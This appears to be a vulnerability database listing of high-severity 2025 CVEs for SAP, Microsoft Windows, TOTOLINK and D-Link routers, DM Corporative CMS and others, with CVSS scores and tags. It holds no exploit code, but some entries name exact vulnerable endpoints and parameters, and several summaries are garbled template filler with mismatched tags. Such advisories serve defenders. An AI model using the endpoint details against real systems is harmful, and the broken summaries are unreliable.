Privilege escalation vulnerability in SAP GRC that allows authenticated non-administrative users to access and initiate transactions capable of modifying system credentials. This critical flaw compromises confidentiality, integrity, and availability across the application, with a CVSS score of 8.8 indicating high severity. The vulnerability requires valid credentials to exploit but has no privilege requirements beyond basic user access, making it a significant risk in environments with broad GRC user bases.
Sap
Information Disclosure
-
CVE-2025-42977
HIGH
CVSS 7.6
SAP NetWeaver Visual Composer contains a directory traversal vulnerability (CWE-22) that allows high-privileged users to bypass path validation controls and read or modify arbitrary files on the system. The vulnerability affects SAP NetWeaver Visual Composer across supported versions and has a CVSS score of 7.6 due to high confidentiality impact and network-accessible attack vector, though exploitation requires high privileges (PR:H). Exploitation likelihood and KEV/POC status cannot be confirmed from available data, but the high-privilege prerequisite significantly reduces real-world exploitability compared to the base CVSS score suggests.
Sap
Path Traversal
Information Disclosure
-
CVE-2025-40662
HIGH
CVSS 7.5
CVE-2025-40662 is an absolute path disclosure vulnerability in DM Corporative CMS that exposes sensitive filesystem information when an attacker requests non-existent files within the webroot/file directory. This high-severity information disclosure (CVSS 7.5) affects DM Corporative CMS users and allows unauthenticated remote attackers to enumerate and discover the absolute filesystem paths of the application, which typically precedes further exploitation. The vulnerability has not been confirmed as actively exploited in the wild (KEV status unknown from provided data), but represents a significant reconnaissance vector with minimal attack complexity.
Information Disclosure
Path Traversal
Dm Corporative Cms
-
CVE-2025-40661
HIGH
CVSS 7.5
CVE-2025-40661 is an Insecure Direct Object Reference (IDOR) vulnerability in DM Corporative CMS that allows unauthenticated attackers to bypass authentication and access the private administrative area by manipulating the 'option' parameter (values 0, 1, or 2) in the /administer/selectionnode/selection.asp endpoint. The vulnerability has a CVSS score of 7.5 (High) with high confidentiality impact, indicating potential exposure of sensitive administrative data. No KEV status, EPSS score, or confirmed POC availability was provided in the source data, limiting definitive assessment of active exploitation.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40660
HIGH
CVSS 7.5
CVE-2025-40660 is a security vulnerability (CVSS 7.5) that allows an attacker. High severity vulnerability requiring prompt remediation.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40659
HIGH
CVSS 7.5
CVE-2025-40659 is an Insecure Direct Object Reference (IDOR) vulnerability in DM Corporative CMS that allows unauthenticated attackers to bypass access controls and view the private administrative area by manipulating the 'option' parameter (values 0, 1, or 2) in the /administer/selectionnode/framesSelectionNetworks.asp endpoint. This high-severity vulnerability (CVSS 7.5) has a high confidentiality impact but does not enable data modification or service disruption. No active exploitation in the wild (KEV) or public proof-of-concept has been confirmed in available intelligence, but the vulnerability's simplicity and unauthenticated attack vector make it a significant priority for affected organizations.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40658
HIGH
CVSS 7.5
CVE-2025-40658 is an Insecure Direct Object Reference (IDOR) vulnerability in DM Corporative CMS that allows unauthenticated remote attackers to bypass access controls and view private administrative areas by manipulating the 'option' parameter (values 0, 1, or 2) in the /administer/selectionnode/framesSelection.asp endpoint. The vulnerability has a CVSS 3.1 score of 7.5 (High) with high confidentiality impact, no privilege requirement, and no user interaction needed, making it a significant authentication bypass risk for affected CMS installations.
Information Disclosure
Dm Corporative Cms
-
CVE-2025-40591
HIGH
CVSS 7.7
A security vulnerability in A vulnerability (CVSS 7.7). High severity vulnerability requiring prompt remediation.
Command Injection
Siemens
RCE
Information Disclosure
Privilege Escalation
-
CVE-2025-37100
HIGH
CVSS 7.7
Path traversal vulnerability in HPE Aruba Networking Private 5G Core APIs that allows authenticated users to iteratively navigate the filesystem and download sensitive system files. The vulnerability affects the Private 5G Core platform with a CVSS score of 7.7 (high severity) due to confidentiality impact across system boundaries. While requiring low-privilege authentication and network access, successful exploitation directly exposes protected system files containing sensitive configuration and credential data.
Path Traversal
Information Disclosure
-
CVE-2025-36575
HIGH
CVSS 7.5
A information disclosure vulnerability in an Exposure of Sensitive Information (CVSS 7.5). High severity vulnerability requiring prompt remediation.
Information Disclosure
Dell
Wyse Management Suite
-
CVE-2025-36574
HIGH
CVSS 8.2
Dell Wyse Management Suite versions prior to 5.2 contain an Absolute Path Traversal vulnerability (CWE-36) that allows unauthenticated remote attackers to read arbitrary files and gain unauthorized access without user interaction. The CVSS 8.2 score reflects high confidentiality impact and low integrity impact, with network-based attack vector requiring no privileges or interaction. No KEV/CISA active exploitation data, EPSS score, or public POC is currently confirmed in available intelligence, but the unauthenticated remote nature and path traversal primitive warrant immediate patching.
Authentication Bypass
Information Disclosure
Path Traversal
Dell
Wyse Management Suite
-
CVE-2025-35940
HIGH
CVSS 8.1
Critical authentication bypass vulnerability in ArchiverSpaApi ASP.NET applications caused by hard-coded JWT signing keys. An unauthenticated remote attacker can forge valid JWT tokens to bypass authentication and gain unauthorized access to protected API endpoints, potentially leading to data exfiltration, modification, or denial of service. The CVSS 8.1 score reflects high confidentiality, integrity, and availability impact, though the attack complexity is rated as high, suggesting some technical prerequisites.
Authentication Bypass
Dotnet
Information Disclosure
-
CVE-2025-33112
HIGH
CVSS 8.4
Local privilege escalation vulnerability in IBM AIX 7.3 and IBM VIOS 4.1.1's Perl implementation that allows non-privileged local users to execute arbitrary code through improper pathname neutralization (path traversal). With a CVSS score of 8.4 and no authentication requirement, this represents a critical risk for AIX environments where local user access exists. The vulnerability's active exploitation status and proof-of-concept availability would significantly elevate real-world risk.
RCE
IBM
Privilege Escalation
Path Traversal
Aix
-
CVE-2025-33075
HIGH
CVSS 7.8
Privilege escalation vulnerability in Windows Installer that exploits improper symlink/junction handling (CWE-59: link following) to allow an authorized local attacker to elevate privileges without user interaction. With a CVSS score of 7.8 and CVSS vector indicating local attack vector with low complexity and no user interaction required, this vulnerability affects Windows Installer across multiple versions. Real-world risk depends on KEV/CISA status and EPSS probability, which should be cross-referenced against active exploitation reports and POC availability.
Microsoft
Windows
Privilege Escalation
Windows Server 2019
Windows Server 2025
-
CVE-2025-33071
HIGH
CVSS 8.1
Use-after-free memory corruption vulnerability in Windows KDC Proxy Service (KPSSVC) that allows unauthenticated network attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. The vulnerability affects Windows systems running the Kerberos KDC Proxy Service and represents a critical remote code execution risk in Active Directory environments. While specific KEV/POC status and EPSS scores are not provided in the source data, the network attack vector combined with high CVSS 8.1 score and remote code execution capability indicates this is a significant priority for organizations relying on Windows authentication infrastructure.
Use After Free
Microsoft
Windows
RCE
Windows Server 2022 23h2
-
CVE-2025-33070
HIGH
CVSS 8.1
Use-of-uninitialized-resource vulnerability in Windows Netlogon that allows unauthenticated network attackers to achieve privilege escalation through a complex exploitation path. The vulnerability affects Windows systems running Netlogon services and enables remote code execution with high impact on confidentiality, integrity, and availability. Given the network-based attack vector and lack of authentication requirements, this represents a significant threat to networked Windows environments, though exploitation requires specific conditions (high attack complexity).
Microsoft
Authentication Bypass
Windows 11 24h2
Windows 10 1607
Windows 10 1809
-
CVE-2025-33067
HIGH
CVSS 8.4
Local privilege escalation vulnerability in the Windows Kernel stemming from improper privilege management (CWE-269), allowing an unauthenticated attacker with local system access to escalate privileges without user interaction. This affects multiple Windows versions and has a CVSS 8.4 severity rating indicating high confidentiality, integrity, and availability impact. The vulnerability's low attack complexity (AC:L) and lack of privilege requirements (PR:N) indicate it is relatively straightforward to exploit for any local attacker.
Microsoft
Privilege Escalation
Windows
Windows 10 22h2
Windows 10 1809
-
CVE-2025-33066
HIGH
CVSS 8.8
Heap-based buffer overflow vulnerability in Windows Routing and Remote Access Service (RRAS) that allows unauthenticated remote attackers to execute arbitrary code over the network with user interaction. This is a critical network-accessible vulnerability affecting Windows systems running RRAS; successful exploitation grants the attacker complete system compromise with high confidentiality, integrity, and availability impact. The CVSS 8.8 score reflects the severity, though real-world exploitation probability and active KEV status would determine if this is actively weaponized.
Microsoft
Buffer Overflow
Windows 11 23h2
Windows 10 1809
Windows Server 2019
-
CVE-2025-33064
HIGH
CVSS 8.8
Heap-based buffer overflow vulnerability in Windows Routing and Remote Access Service (RRAS) that allows authenticated network attackers to execute arbitrary code with high impact on confidentiality, integrity, and availability. This is a critical vulnerability affecting RRAS implementations across Windows Server and client operating systems; exploitation requires valid credentials but no user interaction, making it suitable for lateral movement and privilege escalation scenarios within compromised networks.
Microsoft
Buffer Overflow
Windows Server 2025
Windows 11 23h2
Windows 10 1507
-
CVE-2025-33056
HIGH
CVSS 7.5
Network-accessible denial-of-service vulnerability in Microsoft's Local Security Authority Server (lsasrv) caused by improper access control (CWE-284). An unauthenticated remote attacker can exploit this with low complexity to render the LSA service unavailable, affecting authentication and security policy enforcement on affected Windows systems. The CVSS 7.5 severity reflects the high availability impact; however, real-world risk depends on EPSS score, KEV candidacy status, and active exploitation data not provided in the source materials.
Microsoft
Windows
Denial Of Service
Windows Server 2022
Windows 11 22h2
-
CVE-2025-33050
HIGH
CVSS 7.5
Protection mechanism failure in Windows DHCP Server that enables network-based denial-of-service attacks without requiring authentication or user interaction. An attacker can remotely exploit this vulnerability to render DHCP services unavailable, disrupting network connectivity for affected systems. The high CVSS score of 7.5 and network attack vector indicate significant availability impact, though no confidentiality or integrity compromise occurs.
Microsoft
Windows
Dhcp
Denial Of Service
Windows Server 2025
-
CVE-2025-32725
HIGH
CVSS 7.5
Network-accessible denial-of-service vulnerability in Windows DHCP Server caused by a protection mechanism failure (CWE-693), allowing unauthenticated attackers to exhaust server availability without requiring authentication or user interaction. The vulnerability affects Windows DHCP Server implementations across multiple versions and has a CVSS severity of 7.5 (High). While the description does not explicitly reference KEV inclusion, active exploitation status, or EPSS data, the low attack complexity (AC:L) and network accessibility (AV:N) combined with no authentication requirements indicate this represents a credible denial-of-service threat to DHCP infrastructure.
Microsoft
Windows
Dhcp
Denial Of Service
Windows Server 2025
-
CVE-2025-32721
HIGH
CVSS 7.3
Privilege escalation vulnerability in Windows Recovery Driver caused by improper symlink/hardlink resolution (CWE-59: link following) that allows an authenticated local attacker to elevate privileges to SYSTEM level. The vulnerability requires user interaction and local code execution capability but provides complete system compromise once exploited. With a CVSS score of 7.3 and local attack vector, this poses significant risk to multi-user Windows systems, particularly in enterprise environments where standard users have local access.
Microsoft
Windows
Privilege Escalation
Windows Server 2025
Windows 11 23h2
-
CVE-2025-32718
HIGH
CVSS 7.8
CVE-2025-32718 is an integer overflow vulnerability in Windows SMB that allows a locally authenticated attacker to achieve privilege escalation with high impact to confidentiality, integrity, and availability. The vulnerability affects Windows operating systems' SMB implementation and has a CVSS score of 7.8 (High) with low attack complexity, making it a significant local privilege escalation risk for multi-user systems and domain environments.
Microsoft
Windows
Privilege Escalation
Integer Overflow
Windows Server 2012
-
CVE-2025-32716
HIGH
CVSS 7.8
CVE-2025-32716 is an out-of-bounds read vulnerability in Windows Media that allows an authenticated local attacker to achieve privilege escalation on affected systems. The vulnerability has a CVSS score of 7.8 (high severity) due to its impact on confidentiality, integrity, and availability. Without confirmation of KEV status, active exploitation, or public POC availability from the provided data, the real-world risk assessment requires evaluation against the moderate attack complexity (local access required, authenticated user needed).
Microsoft
Windows
Privilege Escalation
Windows Server 2022
Windows Server 2019
-
CVE-2025-32714
HIGH
CVSS 7.8
Local privilege escalation vulnerability in Windows Installer caused by improper access control (CWE-284) that allows an authorized local attacker to elevate privileges without user interaction. The vulnerability affects Windows Installer components across multiple Windows versions and has a CVSS score of 7.8 (High severity). Without confirmation of KEV status or active exploitation data, the high CVSS vector (Low attack complexity, Low privileges required) indicates this represents a significant risk to systems where local user accounts exist.
Microsoft
Windows
Privilege Escalation
Windows 11 24h2
Windows Server 2022 23h2
-
CVE-2025-32713
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in the Windows Common Log File System (CLFS) Driver that allows local authenticated attackers to achieve privilege escalation with high confidence of exploitation. The vulnerability affects Windows systems with the CLFS driver enabled and requires local access with standard user privileges; successful exploitation grants complete system compromise including code execution at SYSTEM level. While no public POC is confirmed in available intelligence, the straightforward nature of heap overflows and the high CVSS score (7.8) with low attack complexity indicate active research interest and potential for rapid weaponization.
Microsoft
Buffer Overflow
Windows
Privilege Escalation
Windows 10 1809
-
CVE-2025-32712
HIGH
CVSS 7.8
Use-after-free vulnerability in the Windows Win32K graphics subsystem (GRFX component) that allows a locally authenticated attacker to achieve arbitrary code execution and privilege escalation without user interaction. The vulnerability affects Windows systems with affected Win32K versions and carries a CVSS score of 7.8 (high severity). Given the local attack vector requirement and the need for prior authentication, real-world exploitation is constrained to insider threats or attackers who have already achieved initial access; however, the severity of the impact (complete system compromise) makes this a critical priority for patching.
Use After Free
Microsoft
Windows
Privilege Escalation
Windows Server 2022 23h2
-
CVE-2025-32710
HIGH
CVSS 8.1
Use-after-free vulnerability in Windows Remote Desktop Services (RDS) that allows unauthenticated network attackers to execute arbitrary code with high complexity requirements. The vulnerability affects Windows systems running RDS and represents a critical remote code execution risk; exploitation requires network access but no user interaction, though attack complexity is rated as high. If this CVE has been added to CISA's Known Exploited Vulnerabilities (KEV) catalog, it indicates active exploitation in the wild and should be treated as an immediate priority.
Microsoft
Windows
Remote Code Execution
Use After Free
Windows Server 2025
-
CVE-2025-31104
HIGH
CVSS 7.2
FortiADC versions 6.1 through 7.6.1 contain an OS command injection vulnerability (CWE-78) that allows authenticated attackers with high privileges to execute arbitrary code through crafted HTTP requests. The vulnerability affects multiple product versions across several release branches, with a CVSS score of 7.2 indicating high severity. While the attack requires authentication and high-level privileges, successful exploitation results in complete system compromise with confidentiality, integrity, and availability impact.
Command Injection
Fortinet
Fortigate
RCE
Authentication Bypass
-
CVE-2025-30327
HIGH
CVSS 7.8
CVE-2025-30327 is an integer overflow vulnerability in Adobe InCopy that enables arbitrary code execution with the privileges of the current user. Versions 20.2, 19.5.3 and earlier are affected; exploitation requires a user to open a malicious file, making it a file-based attack vector with moderate attack complexity. The vulnerability has a CVSS score of 7.8 (high severity) with complete impact on confidentiality, integrity, and availability, though real-world exploitation depends on user interaction and file delivery success.
RCE
Integer Overflow
Adobe
Incopy
-
CVE-2025-30317
HIGH
CVSS 7.8
Heap-based buffer overflow vulnerability in Adobe InDesign Desktop that allows arbitrary code execution when a user opens a malicious file. Affected versions include InDesign ID20.2, ID19.5.3, and earlier. The vulnerability requires user interaction but presents high severity risk (CVSS 7.8) with potential for complete system compromise in the context of the affected user's privileges.
Buffer Overflow
RCE
Adobe
Indesign
-
CVE-2025-30145
HIGH
CVSS 7.5
Denial-of-service vulnerability in GeoServer that allows unauthenticated remote attackers to execute malicious Jiffle scripts, causing infinite loops and service unavailability. Affected versions are GeoServer prior to 2.25.7, 2.26.3, and 2.27.0. The vulnerability is triggered through WMS dynamic styling or WPS processes and requires no authentication or user interaction, making it easily exploitable by remote attackers.
Denial Of Service
Geoserver
-
CVE-2025-29828
HIGH
CVSS 8.1
Memory management vulnerability in Windows Cryptographic Services where memory is not properly released after its effective lifetime, enabling unauthenticated remote code execution. The vulnerability affects Windows cryptographic components and allows network-based attackers to execute arbitrary code with high complexity requirements. While the CVSS score of 8.1 indicates significant severity, exploitation requires specific conditions (high attack complexity), and current status regarding KEV listing, EPSS score, and public POC availability is unknown pending official Microsoft advisory release.
Microsoft
Windows
RCE
Memory Corruption
Windows 11 24h2
-
CVE-2025-27819
HIGH
CVSS 7.5
A remote code execution vulnerability (CVSS 7.5). High severity vulnerability requiring prompt remediation.
Denial Of Service
Apache
Java
RCE
Authentication Bypass
-
CVE-2025-27818
HIGH
CVSS 8.8
A remote code execution vulnerability in A possible security vulnerability (CVSS 8.8). High severity vulnerability requiring prompt remediation.
Deserialization
Java
Apache
Ldap
RCE
-
CVE-2025-26521
HIGH
CVSS 8.1
CVE-2025-26521 is a security vulnerability (CVSS 8.1). High severity vulnerability requiring prompt remediation.
Apache
Information Disclosure
Kubernetes
Privilege Escalation
Cloudstack
-
CVE-2025-26395
HIGH
CVSS 7.1
Stored/reflected cross-site scripting (XSS) vulnerability in SolarWinds Observability Self-Hosted caused by insufficient input sanitization in URL parameters. The vulnerability affects authenticated administrators and requires user interaction to exploit, allowing attackers with admin credentials to inject malicious scripts that execute in victim browsers with network-scoped impact (C:H, I:L, A:L). There is no indication of active exploitation in the wild (KEV status unknown) or public proof-of-concept availability based on available data.
XSS
Authentication Bypass
Observability Self Hosted
-
CVE-2025-23192
HIGH
CVSS 8.2
Stored Cross-Site Scripting (XSS) vulnerability in SAP BusinessObjects BI Workspace that allows unauthenticated attackers to inject and persist malicious JavaScript code within workspaces. When authenticated users access compromised workspaces, the malicious script executes in their browser context, potentially exposing sensitive session tokens, cookies, and user data. The vulnerability has a CVSS score of 8.2 (High) with significant confidentiality impact; while KEV/EPSS data and active exploitation status are not provided in available intelligence, the attack requires user interaction and authentication context, moderating real-world severity despite the high CVSS rating.
Sap
XSS
Information Disclosure
Businessobjects Business Intelligence
-
CVE-2025-22463
HIGH
CVSS 7.3
Cryptographic weakness in Ivanti Workspace Control versions before 10.19.10.0 where a hardcoded encryption key is embedded in the application, allowing authenticated local attackers to decrypt stored environment passwords. This vulnerability enables privilege escalation and lateral movement within affected environments. The CVSS 7.3 score reflects high confidentiality and integrity impact, though exploitation requires local access and user authentication; KEV and active exploitation status are not confirmed in available intelligence.
Information Disclosure
Ivanti
Privilege Escalation
Workspace Control
-
CVE-2025-22455
HIGH
CVSS 8.8
Cryptographic weakness in Ivanti Workspace Control prior to version 10.19.0.0 that uses a hardcoded encryption key to protect SQL database credentials stored locally. A local authenticated attacker with user-level privileges can exploit this to decrypt and extract stored SQL credentials without elevated permissions, potentially leading to lateral movement and data exfiltration. The CVSS 8.8 score reflects high severity due to confidentiality and integrity impacts across system boundaries, though exploitation requires local access and valid authentication.
Information Disclosure
Ivanti
Authentication Bypass
Workspace Control
-
CVE-2025-5985
HIGH
CVSS 7.3
Critical improper authentication vulnerability in code-projects School Fees Payment System version 1.0 that allows unauthenticated remote attackers to bypass authentication controls and gain unauthorized access to the system. The vulnerability has been publicly disclosed with proof-of-concept exploitation details available, making it an active threat with high likelihood of real-world exploitation against educational institutions and payment processing systems.
Authentication Bypass
School Fees Payment System
-
CVE-2025-5980
HIGH
CVSS 7.3
Critical SQL injection vulnerability in code-projects Restaurant Order System 1.0 affecting the /order.php file, specifically the 'tabidNoti' parameter. Remote unauthenticated attackers can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized data access, modification, or deletion. The vulnerability has been publicly disclosed with exploit code available, making active exploitation likely.
PHP
SQLi
Restaurant Order System
-
CVE-2025-5979
HIGH
CVSS 7.3
Critical SQL injection vulnerability in code-projects School Fees Payment System version 1.0, specifically in the /branch.php file's ID parameter, allowing remote unauthenticated attackers to execute arbitrary SQL commands. The vulnerability has been publicly disclosed with proof-of-concept exploitation available, and while the CVSS score is 7.3 (High), the unauthenticated network-accessible attack vector combined with confirmed public exploit disclosure indicates active exploitation risk. This affects all deployments of the vulnerable version without patches applied.
PHP
SQLi
School Fees Payment System
-
CVE-2025-5978
HIGH
CVSS 8.8
A critical stack-based buffer overflow vulnerability exists in Tenda FH1202 firmware version 1.2.0.14 within the /goform/VirtualSer endpoint's fromVirtualSer function, triggered by unsanitized 'page' parameter manipulation. An authenticated attacker can exploit this remotely to achieve arbitrary code execution with full system compromise (confidentiality, integrity, and availability impact). Public exploit disclosure and proof-of-concept availability significantly elevate real-world exploitation risk.
Buffer Overflow
Remote Code Execution
Fh1202 Firmware
Tenda
-
CVE-2025-5977
HIGH
CVSS 7.3
Critical SQL injection vulnerability in code-projects School Fees Payment System version 1.0, specifically in the /datatable.php file where the sSortDir_0 parameter is improperly sanitized. An unauthenticated remote attacker can exploit this to execute arbitrary SQL queries, potentially compromising confidentiality, integrity, and availability of the underlying database. The vulnerability has been publicly disclosed with exploit code available, indicating active exploitation risk.
PHP
SQLi
Remote Code Execution
School Fees Payment System
-
CVE-2025-5969
HIGH
CVSS 8.8
Critical stack-based buffer overflow vulnerability in D-Link DIR-632 firmware version FW103B08, affecting the HTTP POST request handler in the /biurl_grou component. An authenticated attacker can remotely exploit this vulnerability to achieve arbitrary code execution with high impact on confidentiality, integrity, and availability. Public exploit code has been disclosed and the affected product is no longer maintained by D-Link, significantly increasing real-world risk.
Buffer Overflow
D-Link
Remote Code Execution
Dir 632 Firmware
-
CVE-2025-5952
HIGH
CVSS 7.3
A critical OS command injection vulnerability exists in Zend.To versions up to 6.10-6 Beta, where unsanitized user input in the 'file_1' parameter of NSSDropoff.php's exec function allows remote, unauthenticated attackers to execute arbitrary system commands with application-level privileges. The vulnerability has been publicly disclosed with working exploits available, making active exploitation probable, though it affects an older software version that has been superseded by newer releases with additional security controls.
PHP
Command Injection
RCE
-
CVE-2025-5943
HIGH
CVSS 8.8
MicroDicom DICOM Viewer contains an out-of-bounds write vulnerability (CWE-787) that allows remote attackers to execute arbitrary code with high integrity and confidentiality impact (CVSS 8.8). The vulnerability requires user interaction-either visiting a malicious website or opening a crafted DICOM file-making it exploitable in realistic attack scenarios. No active exploitation in the wild (KEV) or public POC has been confirmed at this time, but the network-accessible attack vector and low complexity suggest meaningful real-world risk.
Buffer Overflow
RCE
-
CVE-2025-5934
HIGH
CVSS 8.8
A critical stack-based buffer overflow vulnerability (CVE-2025-5934) exists in Netgear EX3700 wireless extenders up to version 1.0.0.88, affecting the sub_41619C function in the /mtd file. An authenticated attacker can remotely exploit this vulnerability to achieve complete system compromise including confidentiality, integrity, and availability breaches. Public exploit code is available, and while the affected product line is no longer supported by Netgear, immediate patching to version 1.0.0.98 is critical for active deployments.
Buffer Overflow
Netgear
Remote Code Execution
Ex3700 Firmware
-
CVE-2025-5913
HIGH
CVSS 7.3
A SQL injection vulnerability in A vulnerability (CVSS 7.3). Risk factors: public PoC available.
PHP
SQLi
Vehicle Record Management System
-
CVE-2025-5912
HIGH
CVSS 8.8
Critical stack-based buffer overflow vulnerability in D-Link DIR-632 firmware version FW103B08, affecting the HTTP POST Request Handler's do_file function. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with full system compromise (confidentiality, integrity, and availability impact). Public exploit code is available and the affected product is end-of-life with no vendor support.
Buffer Overflow
D-Link
RCE
Dir 632 Firmware
-
CVE-2025-5911
HIGH
CVSS 8.8
A buffer overflow vulnerability in TOTOLINK EX1200T (CVSS 8.8). Risk factors: public PoC available.
Buffer Overflow
TP-Link
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5910
HIGH
CVSS 8.8
Critical buffer overflow vulnerability in TOTOLINK EX1200T routers (firmware versions up to 4.1.2cu.5232_B20210713) affecting the HTTP POST request handler at endpoint /boafrm/formWsc. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with complete system compromise (confidentiality, integrity, and availability). The vulnerability has public exploit code available and may be actively exploited in the wild.
Buffer Overflow
TP-Link
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5909
HIGH
CVSS 8.8
Critical buffer overflow vulnerability in TOTOLINK EX1200T wireless routers (up to firmware version 4.1.2cu.5232_B20210713) affecting the HTTP POST request handler for the /boafrm/formReflashClientTbl endpoint. An authenticated attacker can remotely exploit this vulnerability to achieve complete system compromise including confidentiality, integrity, and availability violations. Public exploit code has been disclosed, making this an active threat with demonstrated proof-of-concept availability.
Buffer Overflow
TP-Link
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5908
HIGH
CVSS 8.8
Critical buffer overflow vulnerability in TOTOLINK EX1200T wireless routers (up to version 4.1.2cu.5232_B20210713) affecting the HTTP POST request handler for the /boafrm/formIpQoS endpoint. An authenticated remote attacker can exploit this vulnerability to achieve arbitrary code execution with complete system compromise (confidentiality, integrity, and availability). The exploit has been publicly disclosed and proof-of-concept code is available, making this a high-priority threat for affected deployments.
Buffer Overflow
TP-Link
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5907
HIGH
CVSS 8.8
Critical buffer overflow vulnerability in TOTOLINK EX1200T routers (firmware versions up to 4.1.2cu.5232_B20210713) affecting the HTTP POST request handler at the /boafrm/formFilter endpoint. An authenticated remote attacker can exploit this vulnerability to achieve remote code execution with full system compromise (confidentiality, integrity, and availability impact). The vulnerability has been publicly disclosed with exploit code available, creating immediate risk for deployed devices.
Buffer Overflow
TP-Link
RCE
Ex1200t Firmware
TOTOLINK
-
CVE-2025-5906
HIGH
CVSS 7.3
Critical authentication bypass vulnerability in code-projects Laundry System 1.0 affecting the /data/ endpoint, allowing unauthenticated remote attackers to read, modify, and potentially disrupt system availability. The vulnerability has been publicly disclosed with exploit code available, and while CVSS 7.3 indicates moderate-to-high severity, the network-based attack vector (AV:N), lack of privilege requirement (PR:N), and absence of user interaction (UI:N) make this immediately exploitable in production environments. Active exploitation is likely given public POC availability and the ease of attack execution.
Authentication Bypass
Laundry System
-
CVE-2025-5905
HIGH
CVSS 8.8
Critical buffer overflow vulnerability in TOTOLINK T10 firmware version 4.1.8cu.5207 affecting the WiFi repeater configuration function. An authenticated remote attacker can exploit this vulnerability by sending a malicious POST request with an oversized Password parameter to /cgi-bin/cstecgi.cgi, achieving complete compromise of the device including arbitrary code execution. Public disclosure and proof-of-concept code availability significantly elevate real-world risk despite requiring authenticated access.
Buffer Overflow
TP-Link
RCE
T10 Firmware
TOTOLINK
-
CVE-2025-5904
HIGH
CVSS 8.8
A critical buffer overflow vulnerability exists in TOTOLINK T10 firmware version 4.1.8cu.5207 in the setWiFiMeshName function of the POST request handler (/cgi-bin/cstecgi.cgi). An authenticated remote attacker can overflow the device_name parameter to achieve arbitrary code execution with complete system compromise (confidentiality, integrity, and availability impact). Public exploit code is available, elevating real-world risk despite the requirement for authenticated access.
Buffer Overflow
TP-Link
RCE
T10 Firmware
TOTOLINK
-
CVE-2025-5903
HIGH
CVSS 8.8
Critical buffer overflow vulnerability in TOTOLINK T10 firmware version 4.1.8cu.5207 affecting the setWiFiAclRules function in the POST request handler (/cgi-bin/cstecgi.cgi). An authenticated attacker can remotely exploit this vulnerability by manipulating the 'desc' parameter to achieve code execution with full system compromise (confidentiality, integrity, and availability impact). A public proof-of-concept exists, elevating real-world exploitation risk despite requiring low-privilege authentication.
Buffer Overflow
TP-Link
RCE
T10 Firmware
TOTOLINK
-
CVE-2025-5740
HIGH
CVSS 7.2
Path traversal vulnerability (CWE-22) in a web application that allows authenticated users with high privileges to write arbitrary files to the system by manipulating file paths. While the CVSS score of 7.2 indicates moderate-to-high severity with high impact to confidentiality, integrity, and availability, the requirement for authenticated high-privilege access (PR:H) significantly constrains real-world exploitability. Active exploitation status, public POC availability, and EPSS score are unknown from the provided data, limiting definitive risk prioritization.
Path Traversal
-
CVE-2025-5353
HIGH
CVSS 8.8
Credential disclosure vulnerability in Ivanti Workspace Control versions before 10.19.10.0, where a hardcoded cryptographic key enables local authenticated attackers to decrypt stored SQL database credentials. This allows privilege escalation and lateral movement within enterprise environments. With a CVSS score of 8.8 and local attack vector requiring authentication, exploitation requires internal access but poses significant risk to SQL database security and overall system compromise.
Information Disclosure
Ivanti
Authentication Bypass
Workspace Control
-
CVE-2025-5335
HIGH
CVSS 7.8
Privilege escalation vulnerability in Autodesk Installer applications where a maliciously crafted binary file exploits an untrusted search path to achieve NT AUTHORITY/SYSTEM level code execution. The vulnerability requires local user interaction (file download) but no privileges, making it a significant risk for Windows environments running Autodesk products. While CVSS 7.8 indicates high severity, the local attack vector and required user interaction limit the attack surface compared to remote exploits.
RCE
Installer
-
CVE-2025-4954
HIGH
CVSS 8.8
A arbitrary file access vulnerability (CVSS 8.8). Risk factors: public PoC available.
WordPress
PHP
RCE
Privilege Escalation
Axle Demo Importer
-
CVE-2025-4840
HIGH
CVSS 7.5
A SQL injection vulnerability in through 1.0.0 does not properly sanitise and escape a parameter (CVSS 7.5). Risk factors: public PoC available.
WordPress
SQLi
PHP
Likes And Dislikes
-
CVE-2025-4681
HIGH
CVSS 8.6
CVE-2025-4681 is an Improper Privilege Management vulnerability in upKeeper Solutions' upKeeper Instant Privilege Access that allows authenticated local attackers with low privileges to escalate permissions and achieve high-impact confidentiality, integrity, and availability violations. This affects all versions of upKeeper Instant Privilege Access before 1.4.0, and the CVSS 8.6 severity combined with local attack vector and low privilege requirements indicates a significant real-world threat to organizations using this privilege access management solution.
Information Disclosure
-
CVE-2025-4680
HIGH
CVSS 8.6
CVE-2025-4680 is an improper input validation vulnerability in upKeeper Solutions' upKeeper Instant Privilege Access that allows attackers with local access and low privileges to bypass access control security levels and achieve high-impact confidentiality, integrity, and availability violations. Versions before 1.4.0 are affected. With a CVSS score of 8.6 and local attack vector requiring user interaction, this represents a significant privilege escalation risk for organizations using this privileged access management solution, particularly if KEV status indicates active exploitation or public POC availability.
Information Disclosure
-
CVE-2025-4678
HIGH
CVSS 7.0
CVE-2025-4678 is an OS command injection vulnerability in Pandora ITSM 5.0.105 where the chromium_path variable fails to properly neutralize special elements, allowing authenticated attackers with high privileges to execute arbitrary system commands. With a CVSS score of 7.0 and network-accessible attack vector, this vulnerability poses a significant risk to affected deployments, particularly if the system is exposed to untrusted administrative users or if privilege escalation chains exist.
Command Injection
-
CVE-2025-4601
HIGH
CVSS 8.8
The RH - Real Estate WordPress Theme contains an Improper Access Control vulnerability (CWE-269) that allows authenticated subscribers and higher-privileged users to escalate their account privileges to administrator level through the inspiry_update_profile() function. All versions up to and including 4.4.0 are affected; versions 4.4.0 contain a partial patch while 4.4.1 provides complete remediation. With a CVSS score of 8.8 and network-based attack vector requiring only low-privilege authentication, this represents a critical privilege escalation risk for any WordPress installation using this theme.
WordPress
Privilege Escalation
PHP
-
CVE-2025-4387
HIGH
CVSS 8.8
